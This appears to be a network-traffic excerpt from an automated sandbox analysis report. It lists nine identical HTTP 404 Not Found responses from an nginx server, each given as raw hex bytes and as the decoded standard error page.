                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:24:30 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:24:31 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:24:32 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:24:34 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:24:36 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:24:39 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:24:42 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:24:45 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:06 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
